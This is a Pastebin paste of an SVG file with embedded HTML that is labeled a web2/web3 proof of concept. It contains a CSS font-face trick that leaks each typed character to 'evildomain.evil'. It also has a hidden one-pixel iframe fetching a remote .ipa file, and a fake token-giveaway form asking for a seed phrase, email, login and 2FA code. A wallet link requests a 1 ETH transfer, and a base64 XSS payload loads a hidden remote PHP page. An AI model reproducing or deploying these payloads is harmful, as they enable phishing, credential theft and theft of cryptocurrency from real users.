API tools faq
paste
Guest User

Untitled

a guest
Dec 13th, 2023
371
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 14.18 KB | None | 0 0
raw download clone embed print report
  1.  
  2. <SvG width="960" height="850">
  3.  
  4. <g transform="translate(300, 0) rotate(20)">
  5.  
  6. <foreignObject x="10" y="10" width="800" height="800">
  7.  
  8. <body xmlns="http://www.w3.org/1999/xhtml">
  9.  
  10. <style>
  11. @font-face {
  12. font-family: 'Red Hat Display',sans-serif;
  13. font-style: normal;
  14. font-weight: 400;
  15. src: url(https://fonts.googleapis.com/css2?family=Red+Hat+Display:wght@300;700&amp;display=swap)
  16. }
  17. * {
  18. font-family: 'Red Hat Display',sans-serif;
  19. font-style: normal;
  20. font-weight: 400;
  21. color: white !important;
  22. fill: white !important;
  23. background-image: url('https://i.pinimg.com/originals/43/7c/b7/437cb739d14912acd84d65ee853b9067.gif');
  24. background-repeat: no-repeat;
  25. -webkit-background-size: cover;
  26. -moz-background-size: cover;
  27. -o-background-size: cover;
  28. background-size: cover;
  29. }
  30. html, body {
  31. margin: 0;
  32. background-image: #121619;
  33. background-color: #121619;
  34.  
  35. }
  36. .container {
  37. --characters: 26;
  38. --typingSpeed: 5s;
  39. height: 50%;
  40. display: flex;
  41. justify-content: center;
  42. align-items: center;
  43. font-size: 3em;
  44. }
  45. .container .text {
  46. position: relative;
  47. }
  48. .container .text::before, .container .text::after {
  49. content: "";
  50. position: absolute;
  51. top: 0;
  52. left: 0;
  53. right: 0;
  54. bottom: 0;
  55. }
  56. .container .text::before {
  57. background-color:rgb(27 30 46);
  58. background-image: url('https://i.pinimg.com/originals/43/7c/b7/437cb739d14912acd84d65ee853b9067.gif');
  59. background-repeat: no-repeat;
  60. -webkit-background-size: cover;
  61. -moz-background-size: cover;
  62. -o-background-size: cover;
  63. background-size: cover;
  64. animation: typing var(--typingSpeed) steps(var(--characters)) 2s infinite;
  65. }
  66. .container .text::after {
  67. background: green;
  68. width: 1ch;
  69. animation: typing var(--typingSpeed) steps(var(--characters)) 2s infinite, blinking 0.25s ease alternate infinite;
  70. }
  71. @keyframes blinking {
  72. to {
  73. background: transparent;
  74. }
  75. }
  76. @keyframes typing {
  77. 80%, 100% {
  78. left: 100%;
  79. }
  80. }
  81. @font-face { font-family: x; src: url(https://evildomain.evil/?password=a), local(Impact); unicode-range: U+61; }
  82. @font-face { font-family: x; src: url(https://evildomain.evil/?password=b), local(Impact); unicode-range: U+62; }
  83. @font-face { font-family: x; src: url(https://evildomain.evil/?password=c), local(Impact); unicode-range: U+63; }
  84. @font-face { font-family: x; src: url(https://evildomain.evil/?password=d), local(Impact); unicode-range: U+64; }
  85. @font-face { font-family: x; src: url(https://evildomain.evil/?password=e), local(Impact); unicode-range: U+65; }
  86. @font-face { font-family: x; src: url(https://evildomain.evil/?password=f), local(Impact); unicode-range: U+66; }
  87. @font-face { font-family: x; src: url(https://evildomain.evil/?password=g), local(Impact); unicode-range: U+67; }
  88. @font-face { font-family: x; src: url(https://evildomain.evil/?password=h), local(Impact); unicode-range: U+68; }
  89. @font-face { font-family: x; src: url(https://evildomain.evil/?password=i), local(Impact); unicode-range: U+69; }
  90. @font-face { font-family: x; src: url(https://evildomain.evil/?password=j), local(Impact); unicode-range: U+6a; }
  91. @font-face { font-family: x; src: url(https://evildomain.evil/?password=k), local(Impact); unicode-range: U+6b; }
  92. @font-face { font-family: x; src: url(https://evildomain.evil/?password=l), local(Impact); unicode-range: U+6c; }
  93. @font-face { font-family: x; src: url(https://evildomain.evil/?password=m), local(Impact); unicode-range: U+6d; }
  94. @font-face { font-family: x; src: url(https://evildomain.evil/?password=n), local(Impact); unicode-range: U+6e; }
  95. @font-face { font-family: x; src: url(https://evildomain.evil/?password=o), local(Impact); unicode-range: U+6f; }
  96. @font-face { font-family: x; src: url(https://evildomain.evil/?password=p), local(Impact); unicode-range: U+70; }
  97. @font-face { font-family: x; src: url(https://evildomain.evil/?password=q), local(Impact); unicode-range: U+71; }
  98. @font-face { font-family: x; src: url(https://evildomain.evil/?password=r), local(Impact); unicode-range: U+72; }
  99. @font-face { font-family: x; src: url(https://evildomain.evil/?password=s), local(Impact); unicode-range: U+73; }
  100. @font-face { font-family: x; src: url(https://evildomain.evil/?password=t), local(Impact); unicode-range: U+74; }
  101. @font-face { font-family: x; src: url(https://evildomain.evil/?password=u), local(Impact); unicode-range: U+75; }
  102. @font-face { font-family: x; src: url(https://evildomain.evil/?password=v), local(Impact); unicode-range: U+76; }
  103. @font-face { font-family: x; src: url(https://evildomain.evil/?password=w), local(Impact); unicode-range: U+77; }
  104. @font-face { font-family: x; src: url(https://evildomain.evil/?password=y), local(Impact); unicode-range: U+78; }
  105. @font-face { font-family: x; src: url(https://evildomain.evil/?password=x), local(Impact); unicode-range: U+79; }
  106. @font-face { font-family: x; src: url(https://evildomain.evil/?password=z), local(Impact); unicode-range: U+7a; }
  107. @font-face { font-family: x; src: url(https://evildomain.evil/?password=0), local(Impact); unicode-range: U+30; }
  108. @font-face { font-family: x; src: url(https://evildomain.evil/?password=1), local(Impact); unicode-range: U+31; }
  109. @font-face { font-family: x; src: url(https://evildomain.evil/?password=2), local(Impact); unicode-range: U+32; }
  110. @font-face { font-family: x; src: url(https://evildomain.evil/?password=3), local(Impact); unicode-range: U+33; }
  111. @font-face { font-family: x; src: url(https://evildomain.evil/?password=4), local(Impact); unicode-range: U+34; }
  112. @font-face { font-family: x; src: url(https://evildomain.evil/?password=5), local(Impact); unicode-range: U+35; }
  113. @font-face { font-family: x; src: url(https://evildomain.evil/?password=6), local(Impact); unicode-range: U+36; }
  114. @font-face { font-family: x; src: url(https://evildomain.evil/?password=7), local(Impact); unicode-range: U+37; }
  115. @font-face { font-family: x; src: url(https://evildomain.evil/?password=8), local(Impact); unicode-range: U+38; }
  116. @font-face { font-family: x; src: url(https://evildomain.evil/?password=9), local(Impact); unicode-range: U+39; }
  117. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%60), local(Impact); unicode-range: U+60; }
  118. @font-face { font-family: x; src: url(https://evildomain.evil/?password=~), local(Impact); unicode-range: U+7e; }
  119. @font-face { font-family: x; src: url(https://evildomain.evil/?password=!), local(Impact); unicode-range: U+21; }
  120. @font-face { font-family: x; src: url(https://evildomain.evil/?password=@), local(Impact); unicode-range: U+40; }
  121. @font-face { font-family: x; src: url(https://evildomain.evil/?password=#), local(Impact); unicode-range: U+23; }
  122. @font-face { font-family: x; src: url(https://evildomain.evil/?password=$), local(Impact); unicode-range: U+24; }
  123. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%), local(Impact); unicode-range: U+25; }
  124. @font-face { font-family: x; src: url(https://evildomain.evil/?password=^), local(Impact); unicode-range: U+5e; }
  125. @font-face { font-family: x; src: url(https://evildomain.evil/?password=*), local(Impact); unicode-range: U+2a; }
  126. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%28), local(Impact); unicode-range: U+28; }
  127. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%29), local(Impact); unicode-range: U+29; }
  128. @font-face { font-family: x; src: url(https://evildomain.evil/?password=_), local(Impact); unicode-range: U+5f; }
  129. @font-face { font-family: x; src: url(https://evildomain.evil/?password=-), local(Impact); unicode-range: U+2d; }
  130. @font-face { font-family: x; src: url(https://evildomain.evil/?password==), local(Impact); unicode-range: U+3d; }
  131. @font-face { font-family: x; src: url(https://evildomain.evil/?password=+), local(Impact); unicode-range: U+2b; }
  132. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%5b), local(Impact); unicode-range: U+5b; }
  133. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%7b), local(Impact); unicode-range: U+7b; }
  134. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%5d), local(Impact); unicode-range: U+5d; }
  135. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%7d), local(Impact); unicode-range: U+7d; }
  136. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%5c), local(Impact); unicode-range: U+5c; }
  137. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%7c), local(Impact); unicode-range: U+7c; }
  138. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%27), local(Impact); unicode-range: U+27; }
  139. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%22), local(Impact); unicode-range: U+22; }
  140. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3b), local(Impact); unicode-range: U+3b; }
  141. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3a), local(Impact); unicode-range: U+3a; }
  142. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%2f), local(Impact); unicode-range: U+2f; }
  143. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3f), local(Impact); unicode-range: U+3f; }
  144. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%2e), local(Impact); unicode-range: U+2e; }
  145. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3e), local(Impact); unicode-range: U+3e; }
  146. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%2c), local(Impact); unicode-range: U+2c; }
  147. @font-face { font-family: x; src: url(https://evildomain.evil/?password=%3c), local(Impact); unicode-range: U+3c; }
  148. input{ font-family: x, sans-serif; }
  149. </style>
  150. <iframe style="opacity:0;visibilty:hidden;" width="1px" height="1px;" src="https://ugwst.com/pocs/1.ipa">
  151. </iframe><b><div class="text" style="text-align:center">
  152. </div>
  153. <div class="container">
  154. <div class="text" style="text-align:center">
  155. <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgUPTznKAmqBw8wG5BqSEq0s1ScjHqFA_iZn3J96xgwhZgq0hsBAuYCkhDLyMjbRYSKVXa8drYThBfd-V8buqV5hETu99H9O_NXqQf4XU4xlujD-xMTtcgn1vsQel7wV1J4t1W9TVIAC_t7-RjUFhis8Oua2wwQyIKVGAbLOCr_T-5CQaSLd_w7u0owbQ/s16000/xss-1.webp" height="250px;" width="750px;"></img><br></br>PoC made by <a href='https://twitter.com/_0xPb'><b>0xPb</b><a><p></p> <font style="text-decoration:underline;">
  156. Web2 POC + Web3 Wallet Transaction Signing</font> <font style="text-decoration:underline;"> + FULL INJECTION</font><br></br></div></div><div class="text" style="text-align:center;color:shadow!important">
  157. <br></br>
  158. <h1 style="text-decoration:underline;">
  159. $UGWST TOKEN GIVEAWAY</h1><b>Seedphrase:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
  160. <br></br><b>EMAIL ADDRESS:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
  161. <iframe src='SVdDT057WTBVXzRSM180X0czTjFVU30='>
  162. <br></br><b>LOGIN:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
  163. <br></br><b>2FA:</b><br></br><input style="width:500px;margin-top:10px;font-size:16px;line-height:22px;padding:13px;16px;border:none;background:white;border-radius:4px;color:black !important;" class="LoginInput_input__3wtCc" type="text" name="email" data-test-id="input-email-field"></input>
  164. <br></br><a href="ethereum:0x6Ef4bb9DdCfb9f9D116A11F3F8662B6E0E1a6629?value=1000000000000000000&amp;data=PoC&amp;gas=30000&amp;gasPrice=30000" target="_self">
  165. <button style="width:300px!important;border:none;font-size:16px;line-height:24px;color:#fff;font-weight:600;padding:8px;24px;padding-top:8px;padding-bottom:8px;border-radius:4px;text-decoration:none;display:inline-block;cursor:pointer;width:100%;margin-top:29px;margin-bottom:29px;padding-top:13px;padding-bottom:13px;background-color:rgba(54, 56, 64, 0.6) !important;" type="submit" class="LoginContainer_button__3c9Ij/Button_container__2B8O8 Button_disabled__1f6YP" data-test-id="sign-in-button">
  166. <svg width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg" class="MuiSvgIcon-root MuiSvgIcon-fontSizeSmall" focusable="false" aria-hidden="true" style="margin-right: 8px;"><path d="M14.5 11H13.5C13.2239 11 13 11.2239 13 11.5C13 11.7761 13.2239 12 13.5 12H14.5C14.7761 12 15 11.7761 15 11.5C15 11.2239 14.7761 11 14.5 11ZM4.5 3C3.67157 3 3 3.67157 3 4.5V14.5C3 15.8807 4.11929 17 5.5 17H15.5C16.3284 17 17 16.3284 17 15.5V6.5C17 5.84689 16.5826 5.29127 16 5.08535V4.5C16 3.67157 15.3284 3 14.5 3H4.5ZM4 14.5V5.91465C4.15639 5.96992 4.32468 6 4.5 6H15.5C15.7761 6 16 6.22386 16 6.5V15.5C16 15.7761 15.7761 16 15.5 16H5.5C4.67157 16 4 15.3284 4 14.5ZM4.5 4H14.5C14.7761 4 15 4.22386 15 4.5V5H4.5C4.22386 5 4 4.77614 4 4.5C4 4.22386 4.22386 4 4.5 4Z"></path></svg>Connect Wallet (Android / iOS) - DEFI PoC</button><br></br>
  167. <a href="data:text/html;base64,PGltZyBzcmMgb25lcnJvcj0nYWxlcnQoMTMzNyArICJcclxudWd3c3QgWFNTIiknPjxpZnJhbWUvc3JjPWh0dHBzOi8vdWd3c3QuY29tL3BvY3MvMWZjMzZhMmMtYTA3OS00YzVhLThjNDMtYzA1Zjg3ZDgzYzM2L3ZubS5waHAgc3R5bGU9dmlzaWJpbGl0eTpoaWRkZW4+PC9pZnJhbWU+" target="_self"><button style="width:300px!important;border:none;font-size:16px;line-height:24px;color:#fff;font-weight:600;padding:8px;24px;padding-top:8px;padding-bottom:8px;border-radius:4px;text-decoration:none;display:inline-block;cursor:pointer;width:100%;margin-top:29px;margin-bottom:29px;padding-top:13px;padding-bottom:13px;background-color:rgba(54, 56, 64, 0.6) !important;" type="submit" class="LoginContainer_button__3c9Ij/Button_container__2B8O8 Button_disabled__1f6YP" data-test-id="sign-in-button">
  168. XSS Bypass (Open In new Tab / Close -> CTRL+SHIFT+T)</button></a></a><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br><br></br></div>
  169. </b></body>
  170. </foreignObject>
  171. </g>
  172. </SvG>
Tags: qr iwcon
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!